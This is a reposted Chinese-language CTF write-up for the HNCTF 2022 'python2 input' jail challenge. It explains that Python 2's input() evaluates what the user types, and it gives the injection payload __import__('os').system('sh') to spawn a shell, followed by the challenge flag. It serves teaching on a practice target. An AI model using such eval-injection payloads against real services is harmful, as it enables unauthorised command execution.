WriteUp|【NSSCTF每日一题】[HNCTF2022Week1]python2input(JAIL)

admin
admin
admin
0
文章
0
评论
2026-03-13 00:23:42 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 本文为一篇CTFWriteUp,解析了HNCTF2022Week1中的Python沙箱逃逸题目。核心漏洞在于Python2环境下input()函数会自动对输入内容进行eval求值,导致任意代码执行。文中详细分析了代码逻辑,指出利用__import__(‘os’).system(‘sh’)构造payload即可突破限制获取shell并读取Flag。文章结构清晰,技术点明确,适合初学者了解Python2input函数的安全风险与利用方式。 综合评分: 85 文章分类: CTF,漏洞分析,代码审计,漏洞POC

cover_image

WriteUp | 【NSSCTF每日一题】[HNCTF 2022 Week1]python2 input(JAIL)

原创

特别顾问 BINGCHN 特别顾问 BINGCHN

凌日网络与信息安全团队

2026年3月11日 12:01 重庆

免责声明:由于传播、利用本公众号凌日网络与信息安全团队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号凌日网络与信息安全团队及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

查看附件,是python2的环境

1. # It's escape this repeat!

3. WELCOME ='''
4. _   _      ___        ___    _____             _    _ _
5. | | | |    / _ \      |__ \  |_   _|           | |  | | |
6. _ __  _   _| |_| |__ | | | |_ __    ) |   | |  _ __  _ __ | |  | | |_
7. | '_ \| ||| __|'_ \| | | | '_ \  //|||'_ \| '_ \| ||| __|
8. ||_)||_|||_|||||_|||||/ /_   _||_|||||_)||__|||_
9. |.__/ \__,|\__|_||_|\___/|_||_|____||_____|_||_|.__/ \____/ \__|
10. ||     __/|||
11. |_||___/|_|
12. '''

14. print WELCOME

16. print "Welcome to the python jail"
17. print "But this program will repeat your messages"
18. input_data = input("> ")
19. print input_data

代码解析

        1.语法特性:代码使用 print 后直接跟内容(无括号)、input() 接收输入,是 Python 2 的语法,在 Python 3 中会报错(Python 3 中 print 是函数,需加括号,且 input() 行为也有差异);         2.核心逻辑:本质是 “输入 – 输出” 的简单回显,没有复杂逻辑,但注释 It’s escape this repeat! 暗示这是一个 “Python 监狱” 类的题目,目标是突破 “仅重复输入” 的限制(比如通过输入 Python 代码执行命令);         3.潜在漏洞:Python 2 的 input() 会直接执行输入的字符串作为代码(比如输入 import(‘os’).system(‘ls’) 可执行系统命令),这是该 “监狱” 可被突破的关键。

在python2中,input函数从标准输入接收输入,并且自动eval求值,返回求出来的值 在python2中,raw_input函数从标准输入接收输入,并返回输入字符串 在python3中,input函数从标准输入接收输入,并返回输入字符串

那么去getshell的payload:

1. __import__('os').system('sh')

最后拿到题目的flag

Flag

1. NSSCTF{18d36691-3418-431c-bea7-f26915634f2f}

免责声明:由于传播、利用本公众号凌日网络与信息安全团队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号凌日网络与信息安全团队及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:凌日网络与信息安全团队 特别顾问 BINGCHN 特别顾问 BINGCHN《WriteUp | 【NSSCTF每日一题】[HNCTF 2022 Week1]python2 input(JAIL)》

版权声明

本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。

ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
安全领域涉猎者-乌云独行地带
    ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
    安全领域涉猎者-乌云独行地带
    ZONE.CI 全球网
    评论:0   参与:  0